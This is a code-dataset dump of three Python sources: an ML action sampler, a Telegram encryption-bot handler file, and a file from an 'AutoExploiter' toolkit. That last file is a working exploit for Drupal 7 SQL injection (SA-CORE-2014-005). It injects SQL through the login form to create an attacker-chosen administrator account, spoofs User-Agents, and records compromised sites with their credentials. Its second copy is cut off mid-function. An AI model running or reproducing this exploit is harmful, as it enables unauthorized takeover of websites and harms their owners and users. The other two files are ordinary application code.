        # Declares the configuration options this sampler understands; the
        # values are injected onto ``self.options`` by @auto_import_options.
        spec = PyOptionSpec()
        spec.addStrOption(
            'sample_policy',
            'choices of epsilon-greedy, multinomial, or uniform',
            'epsilon-greedy')
        spec.addBoolOption(
            'store_greedy',
            ('if enabled, picks maximum-probability action; '
             'otherwise, sample from distribution'),
            False)
        spec.addFloatOption(
            'epsilon',
            'used in epsilon-greedy',
            0.0)
        spec.addStrListOption(
            'sample_nodes',
            'nodes to be sampled and saved',
            ['pi,a'])
        return spec

    @auto_import_options
    def __init__(self, option_map):
        """Initialization for Sampler."""
        # Parse "policy,action" pairs, e.g. the default "pi,a" -> ("pi", "a").
        self.sample_nodes = []
        for nodes in self.options.sample_nodes:
            policy, action = nodes.split(",")
            self.sample_nodes.append((policy, action))

    def sample(self, state_curr):
        """Sample an action from distribution using a certain sample method

        Args:
            state_curr(dict): current state containing all data
        """
        # TODO: This only handles epsilon_greedy and multinomial for now. Add
        # uniform and original_distribution?
        sampler = (epsilon_greedy
                   if self.options.store_greedy
                   else sample_multinomial)
        actions = {}
        for pi_node, a_node in self.sample_nodes:
            # Store both the sampled action and the raw policy tensor data so
            # downstream consumers can see the distribution that produced it.
            actions[a_node] = sampler(state_curr, self.options, node=pi_node)
            actions[pi_node] = state_curr[pi_node].data
        return actions
|
# Copyright (c) 2018-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
from elf.options import auto_import_options, PyOptionSpec
from .sample_methods import sample_multinomial, epsilon_greedy
class Sampler(object):
@classmethod
def get_option_spec(cls):
spec = PyOptionSpec()
spec.addStrOption(
'sample_policy',
'choices of epsilon-greedy, multinomial, or uniform',
'epsilon-greedy')
spec.addBoolOption(
'store_greedy',
('if enabled, picks maximum-probability action; '
'otherwise, sample from distribution'),
False)
spec.addFloatOption(
'epsilon',
'used in epsilon-greedy',
0.0)
spec.addStrListOption(
'sample_nodes',
'nodes to be sampled and saved',
['pi,a'])
return spec
@auto_import_options
def __init__(self, option_map):
"""Initialization for Sampler."""
self.sample_nodes = []
for nodes in self.options.sample_nodes:
policy, action = nodes.split(",")
self.sample_nodes.append((policy, action))
def sample(self, state_curr):
"""Sample an action from distribution using a certain sample method
Args:
state_curr(dict): current state containing all data
"""
# TODO: This only handles epsilon_greedy and multinomial for now. Add
# uniform and original_distribution?
sampler = (epsilon_greedy
if self.options.store_greedy
else sample_multinomial)
actions = {}
for pi_node, a_node in self.sample_nodes:
actions[a_node] = sampler(state_curr, self.options, node=pi_node)
actions[pi_node] = state_curr[pi_node].data
return actions
|
en
| 0.83319
|
# Copyright (c) 2018-present, Facebook, Inc. # All rights reserved. # # This source code is licensed under the BSD-style license found in the # LICENSE file in the root directory of this source tree. Initialization for Sampler. Sample an action from distribution using a certain sample method Args: state_curr(dict): current state containing all data # TODO: This only handles epsilon_greedy and multinomial for now. Add # uniform and original_distribution?
| 2.129811
| 2
|
app/handlers/client.py
|
Markushik/cryptographer-bot
| 0
|
6628461
|
<gh_stars>0
import aioredis
import datetime
from aiogram import types, Dispatcher
from aiogram.dispatcher import FSMContext
from aiogram.types import CallbackQuery
from app.keyboard.buttons import inline_Main_Menu, inline_Methods_Menu_Page_1, inline_Methods_Menu_Page_2, \
inline_close_Active_button
from app.states.storage import Redis_Data
def get_realtime(realtime):
    """Return the current local time formatted as ``DD.MM.YYYY HH:MM``.

    The ``realtime`` argument is ignored (kept only for call-site
    compatibility); the value is always recomputed from ``datetime.now()``.
    """
    # Plain format string -- the original used an f-string with no placeholders.
    return datetime.datetime.now().strftime("%d.%m.%Y %H:%M")
async def start_bot(message: types.Message, state: FSMContext):
    # /start entry point: show the welcome text with the main menu keyboard
    # and clear any active FSM state.
    await message.answer(
        text=(
            f"🤖 <b>ENIGMA</b> — <b>активно развивающийся бот</b>, главной задачей которого является шифрование и кодирование пользовательского текста\n\n"
            f"🤝 <b>Сотрудничество</b>\nЕсли у вас есть предложение о совместной деятельности или бизнес интеграции, просим вас написать об этом администратору проекта"
        ),
        reply_markup=inline_Main_Menu, parse_mode="HTML", disable_web_page_preview=True)
    await state.set_state(None)
async def start_onset_button(query: CallbackQuery):
    # Opens page 1 of the encryption-method menu.
    await query.message.edit_text(f"🔍 <b>Выберите метод шифрования</b>",
                                  reply_markup=inline_Methods_Menu_Page_1, parse_mode="HTML")
    await query.answer()
async def start_info_button(query: CallbackQuery):
    # "About" page: tech stack, version/commit, last update and admin contact.
    # NOTE(review): version, update date and status below are hard-coded text,
    # not read from the running bot -- keep in sync manually.
    await query.message.edit_text(
        text=(
            f"⚙️ <b>О Боте</b>\n\n"
            f"┏ <b>Бот</b> написан на асинхронном фреймворке <a href='https://github.com/aiogram/aiogram'><b>Aiogram</b></a>\n"
            f"┣ <b>Поддерживает</b> множество шифров, подробнее по <a href='http://nozdr.ru/games/quest/crypt/cipher/zamena/'><b>ссылке</b></a>\n"
            f"┗ <b>Использует</b> высокопроизводительную базу данных <a href='https://redis.io'><b>Redis</b></a>\n\n"
            f"🛡 Версия бота: <b>[</b><a href='https://github.com/Markushik/cryptographer-bot/commit/z8ec9c7b084a8a8b2925b33b2bc84df8858913ebb'><b>8ec9c7b</b></a><b>]</b>\n"
            f"🛠 Последнее обновление: <b>17.04.2022</b>\n"
            f"🎉 Новое: <b>Клавиатурный Шифр</b>\n\n"
            f"🔋 Статус бота: <b>ACTIVE</b>\n"
            f"🗂 База данных: <b>REDIS</b>\n"
            f"👨🏻💻 Администратор: <b>@nemarK</b>\n"
        ),
        parse_mode='HTML', disable_web_page_preview=True, reply_markup=inline_close_Active_button)
    await query.answer()
async def start_privacy_button(query: CallbackQuery):
    # Privacy-policy page: lists the data the bot collects and how it is used.
    await query.message.edit_text(
        text=(
            f"🤖 <b>ENIGMA</b> собирает следующие данные:\n\n"
            f"\t<b>• ID Пользователя в Telegram</b>\n"
            f"\t<b>• Выбранные Пользователем методы</b>\n"
            f"\t<b>• Вводимый текст Пользователя</b>\n\n"
            f"┏ <b>Данные</b> используются исключительно <b>для анализа</b> активности Пользователей\n"
            f"┣ <b>Данные</b> Пользователя <b>не передаются</b> третьим лицам\n"
            f"┗ В случае несогласия Пользователь <b>обязан</b> немедленно <b>прекратить</b> использование бота\n\n"
            f"<i>Последнее обновление политики конфиденциальности:</i> <b>13.04.2022</b>"
        ),
        parse_mode='HTML', disable_web_page_preview=True, reply_markup=inline_close_Active_button)
    await query.answer()
async def close_button_Active(query: CallbackQuery, state: FSMContext):
    # "Close" button: return to the main-menu welcome screen and reset FSM state.
    await query.message.edit_text(
        text=(
            f"🤖 <b>ENIGMA</b> — <b>активно развивающийся бот</b>, главной задачей которого является шифрование и кодирование пользовательского текста\n\n"
            f"🤝 <b>Сотрудничество</b>\nЕсли у вас есть предложение о совместной деятельности или бизнес интеграции, просим вас написать об этом администратору проекта"
        ),
        reply_markup=inline_Main_Menu, parse_mode="HTML", disable_web_page_preview=True)
    await state.set_state(None)
    await query.answer()
async def close_button_Page_2(query: CallbackQuery, state: FSMContext):
    # "Back" from page 2: show page 1 of the method menu and reset FSM state.
    await query.message.edit_text(f"🔍 <b>Выберите метод шифрования</b>",
                                  reply_markup=inline_Methods_Menu_Page_1, parse_mode="HTML")
    await state.set_state(None)
    await query.answer()
async def go_button(query: CallbackQuery):
    # "Next" button: advance to page 2 of the encryption-method menu.
    await query.message.edit_text(f"🔍 <b>Выберите метод шифрования</b>",
                                  reply_markup=inline_Methods_Menu_Page_2, parse_mode="HTML")
    await query.answer()
async def start_stats_button(query: CallbackQuery, state: FSMContext):
    # Stats page: registers the user in a Redis set and shows the member count.
    realtime = ""
    # NOTE(review): connection details and password are hard-coded here
    # ("<PASSWORD>" is a placeholder) -- they should come from configuration.
    # A new connection is also opened on every click; consider reusing one.
    redis = aioredis.from_url("redis://localhost", port=49154, password="<PASSWORD>", db=5, decode_responses=True)
    await redis.sadd("users", query.from_user.id)
    val = await redis.scard(name="users")
    await query.message.edit_text(
        text=(
            f"📊 <b>Статистика</b>\n\n"
            f"🕔 Статистика на <b>{get_realtime(realtime)}</b>\n"
            f"🆔 Ваш ID: <b>{query.from_user.id}</b>\n"
            f"📅 Дата начала пользования:\n"
            f"👨👩👧👦 Пользователей: <b>{val}</b>\n"
            # NOTE(review): the response-speed figure below is a hard-coded
            # constant, not a measurement.
            f"⚡ Скорость ответа: <b>0.41 сек</b>\n"
        ),
        parse_mode="HTML", reply_markup=inline_close_Active_button)
    await state.set_state(Redis_Data.REDIS_USERS)
    await query.answer()
async def close_button_End_Encoding(query: CallbackQuery):
    # After an encoding finishes: return to page 1 of the method menu.
    await query.message.edit_text(f"🔍 <b>Выберите метод шифрования</b>",
                                  reply_markup=inline_Methods_Menu_Page_1, parse_mode="HTML")
    await query.answer()
def register_handlers(dp: Dispatcher):
    """Attach every client-side handler to the given dispatcher.

    Registration order is preserved from the original hand-written calls.
    """
    dp.register_message_handler(start_bot, commands="start", state="*")
    # (handler, callback-data trigger, FSM state filter or None)
    callback_routes = [
        (start_onset_button, 'Onset_data', None),
        (start_info_button, 'Info_data', None),
        (start_privacy_button, 'Privacy_data', None),
        (close_button_Active, 'close_Active_data', "*"),
        (close_button_Page_2, 'back_to_Menu_Page_1_data', "*"),
        (go_button, 'go_Menu_Page_2_data', None),
        (close_button_End_Encoding, 'close_End_Encoding_data', None),
        (start_stats_button, 'Stats_data', None),
    ]
    for handler, trigger, fsm_state in callback_routes:
        if fsm_state is None:
            dp.register_callback_query_handler(handler, text=[trigger])
        else:
            dp.register_callback_query_handler(handler, text=[trigger], state=fsm_state)
|
import aioredis
import datetime
from aiogram import types, Dispatcher
from aiogram.dispatcher import FSMContext
from aiogram.types import CallbackQuery
from app.keyboard.buttons import inline_Main_Menu, inline_Methods_Menu_Page_1, inline_Methods_Menu_Page_2, \
inline_close_Active_button
from app.states.storage import Redis_Data
def get_realtime(realtime):
    """Return the current local time formatted as ``DD.MM.YYYY HH:MM``.

    The ``realtime`` argument is ignored (kept only for call-site
    compatibility); the value is always recomputed from ``datetime.now()``.
    """
    # Plain format string -- the original used an f-string with no placeholders.
    return datetime.datetime.now().strftime("%d.%m.%Y %H:%M")
async def start_bot(message: types.Message, state: FSMContext):
await message.answer(
text=(
f"🤖 <b>ENIGMA</b> — <b>активно развивающийся бот</b>, главной задачей которого является шифрование и кодирование пользовательского текста\n\n"
f"🤝 <b>Сотрудничество</b>\nЕсли у вас есть предложение о совместной деятельности или бизнес интеграции, просим вас написать об этом администратору проекта"
),
reply_markup=inline_Main_Menu, parse_mode="HTML", disable_web_page_preview=True)
await state.set_state(None)
async def start_onset_button(query: CallbackQuery):
await query.message.edit_text(f"🔍 <b>Выберите метод шифрования</b>",
reply_markup=inline_Methods_Menu_Page_1, parse_mode="HTML")
await query.answer()
async def start_info_button(query: CallbackQuery):
await query.message.edit_text(
text=(
f"⚙️ <b>О Боте</b>\n\n"
f"┏ <b>Бот</b> написан на асинхронном фреймворке <a href='https://github.com/aiogram/aiogram'><b>Aiogram</b></a>\n"
f"┣ <b>Поддерживает</b> множество шифров, подробнее по <a href='http://nozdr.ru/games/quest/crypt/cipher/zamena/'><b>ссылке</b></a>\n"
f"┗ <b>Использует</b> высокопроизводительную базу данных <a href='https://redis.io'><b>Redis</b></a>\n\n"
f"🛡 Версия бота: <b>[</b><a href='https://github.com/Markushik/cryptographer-bot/commit/z8ec9c7b084a8a8b2925b33b2bc84df8858913ebb'><b>8ec9c7b</b></a><b>]</b>\n"
f"🛠 Последнее обновление: <b>17.04.2022</b>\n"
f"🎉 Новое: <b>Клавиатурный Шифр</b>\n\n"
f"🔋 Статус бота: <b>ACTIVE</b>\n"
f"🗂 База данных: <b>REDIS</b>\n"
f"👨🏻💻 Администратор: <b>@nemarK</b>\n"
),
parse_mode='HTML', disable_web_page_preview=True, reply_markup=inline_close_Active_button)
await query.answer()
async def start_privacy_button(query: CallbackQuery):
await query.message.edit_text(
text=(
f"🤖 <b>ENIGMA</b> собирает следующие данные:\n\n"
f"\t<b>• ID Пользователя в Telegram</b>\n"
f"\t<b>• Выбранные Пользователем методы</b>\n"
f"\t<b>• Вводимый текст Пользователя</b>\n\n"
f"┏ <b>Данные</b> используются исключительно <b>для анализа</b> активности Пользователей\n"
f"┣ <b>Данные</b> Пользователя <b>не передаются</b> третьим лицам\n"
f"┗ В случае несогласия Пользователь <b>обязан</b> немедленно <b>прекратить</b> использование бота\n\n"
f"<i>Последнее обновление политики конфиденциальности:</i> <b>13.04.2022</b>"
),
parse_mode='HTML', disable_web_page_preview=True, reply_markup=inline_close_Active_button)
await query.answer()
async def close_button_Active(query: CallbackQuery, state: FSMContext):
await query.message.edit_text(
text=(
f"🤖 <b>ENIGMA</b> — <b>активно развивающийся бот</b>, главной задачей которого является шифрование и кодирование пользовательского текста\n\n"
f"🤝 <b>Сотрудничество</b>\nЕсли у вас есть предложение о совместной деятельности или бизнес интеграции, просим вас написать об этом администратору проекта"
),
reply_markup=inline_Main_Menu, parse_mode="HTML", disable_web_page_preview=True)
await state.set_state(None)
await query.answer()
async def close_button_Page_2(query: CallbackQuery, state: FSMContext):
await query.message.edit_text(f"🔍 <b>Выберите метод шифрования</b>",
reply_markup=inline_Methods_Menu_Page_1, parse_mode="HTML")
await state.set_state(None)
await query.answer()
async def go_button(query: CallbackQuery):
await query.message.edit_text(f"🔍 <b>Выберите метод шифрования</b>",
reply_markup=inline_Methods_Menu_Page_2, parse_mode="HTML")
await query.answer()
async def start_stats_button(query: CallbackQuery, state: FSMContext):
    """Show the statistics screen (caller id, total user count, timestamp).

    Adds the caller to the Redis ``users`` set, reads the set cardinality,
    renders the stats message and switches the FSM to REDIS_USERS.

    Fix: the Redis client created per call is now closed explicitly, so
    each button press no longer leaks a connection/connection pool.
    """
    realtime = ""  # passed to get_realtime(); appears unused by it -- TODO confirm
    redis = aioredis.from_url("redis://localhost", port=49154, password="<PASSWORD>", db=5, decode_responses=True)
    try:
        await redis.sadd("users", query.from_user.id)
        val = await redis.scard(name="users")
    finally:
        # Release the per-call connection even if the Redis ops fail.
        await redis.close()
    await query.message.edit_text(
        text=(
            f"📊 <b>Статистика</b>\n\n"
            f"🕔 Статистика на <b>{get_realtime(realtime)}</b>\n"
            f"🆔 Ваш ID: <b>{query.from_user.id}</b>\n"
            f"📅 Дата начала пользования:\n"
            f"👨‍👩‍👧‍👦 Пользователей: <b>{val}</b>\n"
            f"⚡ Скорость ответа: <b>0.41 сек</b>\n"
        ),
        parse_mode="HTML", reply_markup=inline_close_Active_button)
    await state.set_state(Redis_Data.REDIS_USERS)
    await query.answer()
async def close_button_End_Encoding(query: CallbackQuery):
    """After an encoding result is closed, return to page 1 of the methods menu."""
    await query.message.edit_text(f"🔍 <b>Выберите метод шифрования</b>",
                                  reply_markup=inline_Methods_Menu_Page_1, parse_mode="HTML")
    await query.answer()
def register_handlers(dp: Dispatcher):
    """Attach all command and callback-query handlers to the dispatcher.

    Registration order matters in aiogram (first matching filter wins);
    handlers registered with state="*" fire regardless of the current FSM
    state, the rest only when no state is set.
    """
    dp.register_message_handler(start_bot, commands="start", state="*")
    dp.register_callback_query_handler(start_onset_button, text=['Onset_data'])
    dp.register_callback_query_handler(start_info_button, text=['Info_data'])
    dp.register_callback_query_handler(start_privacy_button, text=['Privacy_data'])
    dp.register_callback_query_handler(close_button_Active, text=['close_Active_data'], state="*")
    dp.register_callback_query_handler(close_button_Page_2, text=['back_to_Menu_Page_1_data'], state="*")
    dp.register_callback_query_handler(go_button, text=['go_Menu_Page_2_data'])
    dp.register_callback_query_handler(close_button_End_Encoding, text=['close_End_Encoding_data'])
    dp.register_callback_query_handler(start_stats_button, text=['Stats_data'])
|
none
| 1
| 2.228271
| 2
|
|
ICG-AutoExploiter/ICG-AutoExploiterBoT-006f76867be3e896ba340f8bb08ba3b5396f1cb2/files/adminTakeoverdupal.py
|
KC1111/Backup
| 0
|
6628462
|
#!/usr/bin/python
#
#
# Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005
# Inspired by yukyuk's P.o.C (https://www.reddit.com/user/fyukyuk)
#
# Tested on Drupal 7.31 with BackBox 3.x
#
# This material is intended for educational
# purposes only and the author can not be held liable for
# any kind of damages done whatsoever to your machine,
# or damages caused by some other,creative application of this material.
# In any case you disagree with the above statement,stop here.
import hashlib, urllib2, optparse, random, sys
# START - from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py
# Calculate a non-truncated Drupal 7 compatible password hash.
# The consumer of these hashes must truncate correctly.
r = '\033[31m'
g = '\033[32m'
y = '\033[33m'
b = '\033[34m'
m = '\033[35m'
c = '\033[36m'
w = '\033[37m'
rr = '\033[39m'
class DrupalHash:
    """Drupal 6/7 compatible password hasher (Python port of Drupal's phpass code).

    Computes a non-truncated hash; the consumer must truncate to the
    length Drupal actually stores (the first 55 characters for $S$ hashes).
    NOTE: this is Python 2 code -- strings are byte strings throughout.
    """
    def __init__(self, stored_hash, password):
        # phpass base-64 alphabet ("./0-9A-Za-z" ordering).
        self.itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
        # Hash `password` with the scheme/cost/salt embedded in `stored_hash`.
        self.last_hash = self.rehash(stored_hash, password)
    def get_hash(self):
        # Accessor for the hash computed in __init__.
        return self.last_hash
    def password_get_count_log2(self, setting):
        # The 4th character of the setting encodes log2 of the iteration count.
        return self.itoa64.index(setting[3])
    def password_crypt(self, algo, password, setting):
        """Iterated, salted hash of `password`; mirrors Drupal's _password_crypt().

        `setting` is the leading "$X$<cost><8-char salt>" portion of a stored
        hash.  Returns setting + encoded digest, or False on a malformed
        setting or unsupported algorithm.
        """
        # Only the first 12 chars form the setting: "$X$" + cost + 8-char salt.
        setting = setting[0:12]
        if setting[0] != '$' or setting[2] != '$':
            return False
        count_log2 = self.password_get_count_log2(setting)
        salt = setting[4:12]
        if len(salt) < 8:
            return False
        # Iteration count is a power of two (key stretching).
        count = 1 << count_log2
        if algo == 'md5':
            hash_func = hashlib.md5
        elif algo == 'sha512':
            hash_func = hashlib.sha512
        else:
            return False
        hash_str = hash_func(salt + password).digest()
        for c in range(count):
            hash_str = hash_func(hash_str + password).digest()
        output = setting + self.custom64(hash_str)
        return output
    def custom64(self, string, count = 0):
        """Encode `string` with phpass' little-endian base-64 variant."""
        if count == 0:
            count = len(string)
        output = ''
        i = 0
        itoa64 = self.itoa64
        while 1:
            # Pack up to 3 bytes little-endian, emit up to 4 base-64 chars.
            value = ord(string[i])
            i += 1
            output += itoa64[value & 0x3f]
            if i < count:
                value |= ord(string[i]) << 8
            output += itoa64[(value >> 6) & 0x3f]
            if i >= count:
                break
            i += 1
            if i < count:
                value |= ord(string[i]) << 16
            output += itoa64[(value >> 12) & 0x3f]
            if i >= count:
                break
            i += 1
            output += itoa64[(value >> 18) & 0x3f]
            if i >= count:
                break
        return output
    def rehash(self, stored_hash, password):
        """Dispatch on the stored hash's prefix and recompute the matching hash."""
        # Drupal 6 compatibility: plain 32-char md5 hex with no "$" marker.
        if len(stored_hash) == 32 and stored_hash.find('$') == -1:
            return hashlib.md5(password).hexdigest()
        # Drupal 7: an updated ("U$") hash had the password md5'd once at migration.
        if stored_hash[0:2] == 'U$':
            stored_hash = stored_hash[1:]
            password = hashlib.md5(password).hexdigest()
        hash_type = stored_hash[0:3]
        if hash_type == '$S$':
            hash_str = self.password_crypt('sha512', password, stored_hash)
        elif hash_type == '$H$' or hash_type == '$P$':
            hash_str = self.password_crypt('md5', password, stored_hash)
        else:
            hash_str = False
        return hash_str
# END - from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py
def randomAgentGen():
    """Return one User-Agent string picked at random from a fixed pool of real browsers."""
    agents = ['Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
              'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
              'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4',
              'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
              'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',
              'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',
              'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0',
              'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
              'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53',
              'Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53',
              'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
              'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0',
              'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
              'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
              'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10',
              'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0',
              'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D167 Safari/9537.53',
              'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/7.0.2 Safari/537.74.9',
              'Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
              'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53',
              'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14',
              'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
              'Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0',
              'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
              'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
              'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0',
              'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',
              'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
              'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) GSA/4.1.0.31802 Mobile/11D257 Safari/9537.53',
              'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',
              'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
              'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
              'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/36.0.1985.125 Chrome/36.0.1985.125 Safari/537.36',
              'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:30.0) Gecko/20100101 Firefox/30.0',
              'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Safari/600.1.3',
              'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36']
    return random.choice(agents)
def urldrupal(url):
    """Append the login-block query string to a scheme-validated base URL.

    NOTE(review): sys.exit(1) raises SystemExit, which the bare `except`
    below swallows -- so a URL without an http(s) scheme does NOT abort
    the script; this function silently returns None instead.
    """
    try:
        if url[:8] != "https://" and url[:7] != "http://":
            sys.exit(1)
        # Page login
        url = url+'/?q=node&destination=node'
        return url
    except:
        pass
commandList = optparse.OptionParser('usage: %prog -t http[s]://TARGET_URL -u USER -p PASS\n')
commandList.add_option('-t', '--target',
action="store",
help="Insert URL: http[s]://www.victim.com",
)
commandList.add_option('-u', '--username',
action="store",
help="Insert username",
)
commandList.add_option('-p', '--pwd',
action="store",
help="Insert password",
)
options, remainder = commandList.parse_args()
# Check args
if not options.target or not options.username or not options.pwd:
sys.exit(1)
host = options.target
user = options.username
password = <PASSWORD>
hash = DrupalHash("$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML", password).get_hash()
target = urldrupal(host)
# Add new user:
# insert into users (status, uid, name, pass) SELECT 1, MAX(uid)+1, 'admin', '$S$DkIkdKLIvRK<PASSWORD>X7B/M8<PASSWORD>E1Tp/kMO<PASSWORD>AZld' FROM users
#
# Set administrator permission (rid = 3):
# insert into users_roles (uid, rid) VALUES ((SELECT uid FROM users WHERE name = 'admin'), 3)
#
post_data = "name[0%20;insert+into+users+(status,+uid,+name,+pass)+SELECT+1,+MAX(uid)%2B1,+%27"+user+"%27,+%27"+hash[:55]+"%27+FROM+users;insert+into+users_roles+(uid,+rid)+VALUES+((SELECT+uid+FROM+users+WHERE+name+%3d+%27"+user+"%27),+3);;#%20%20]=test3&name[0]=test&pass=<PASSWORD>&test2=test&form_build_id=&form_id=user_login_block&op=Log+in"
UA = randomAgentGen()
try:
req = urllib2.Request(target, post_data, headers={ 'User-Agent': UA })
content = urllib2.urlopen(req).read()
if "mb_strlen() expects parameter 1" in content:
print c + ' [' + y + '+' + c + '] ' + y + 'Drupal Add admin' + g + ' [Vuln!!]'
with open('result/AdminTakeoverDrupal_results.txt', 'a') as writer:
writer.write(str(target).split('/')[2] + '/user/login' + '\n' + 'username: ' + str(user) + '\n'
+ 'password: ' + str(password) + '\n')
else:
print c + ' [' + y + '-' + c + '] ' + r + str(target).split('/')[2] + ' ' + y +\
'Drupal Add admin' + c + ' [Not Vuln]'
except urllib2.HTTPError as e:
print c + ' [' + y + '-' + c + '] ' + r + str(target).split('/')[2] + ' ' + y +\
'Drupal Add admin' + c + ' [Not Vuln]'
except urllib2.URLError as e:
print c + ' [' + y + '-' + c + '] ' + r + str(target).split('/')[2] + ' ' + y +\
'Drupal Add admin' + c + ' [Not Vuln]'
except:
print c + ' [' + y + '-' + c + '] ' + r + str(target).split('/')[2] + ' ' + y +\
'Drupal Add admin' + c + ' [Not Vuln]'
|
#!/usr/bin/python
#
#
# Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005
# Inspired by yukyuk's P.o.C (https://www.reddit.com/user/fyukyuk)
#
# Tested on Drupal 7.31 with BackBox 3.x
#
# This material is intended for educational
# purposes only and the author can not be held liable for
# any kind of damages done whatsoever to your machine,
# or damages caused by some other,creative application of this material.
# In any case you disagree with the above statement,stop here.
import hashlib, urllib2, optparse, random, sys
# START - from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py
# Calculate a non-truncated Drupal 7 compatible password hash.
# The consumer of these hashes must truncate correctly.
r = '\033[31m'
g = '\033[32m'
y = '\033[33m'
b = '\033[34m'
m = '\033[35m'
c = '\033[36m'
w = '\033[37m'
rr = '\033[39m'
class DrupalHash:
def __init__(self, stored_hash, password):
self.itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
self.last_hash = self.rehash(stored_hash, password)
def get_hash(self):
return self.last_hash
def password_get_count_log2(self, setting):
return self.itoa64.index(setting[3])
def password_crypt(self, algo, password, setting):
setting = setting[0:12]
if setting[0] != '$' or setting[2] != '$':
return False
count_log2 = self.password_get_count_log2(setting)
salt = setting[4:12]
if len(salt) < 8:
return False
count = 1 << count_log2
if algo == 'md5':
hash_func = hashlib.md5
elif algo == 'sha512':
hash_func = hashlib.sha512
else:
return False
hash_str = hash_func(salt + password).digest()
for c in range(count):
hash_str = hash_func(hash_str + password).digest()
output = setting + self.custom64(hash_str)
return output
def custom64(self, string, count = 0):
if count == 0:
count = len(string)
output = ''
i = 0
itoa64 = self.itoa64
while 1:
value = ord(string[i])
i += 1
output += itoa64[value & 0x3f]
if i < count:
value |= ord(string[i]) << 8
output += itoa64[(value >> 6) & 0x3f]
if i >= count:
break
i += 1
if i < count:
value |= ord(string[i]) << 16
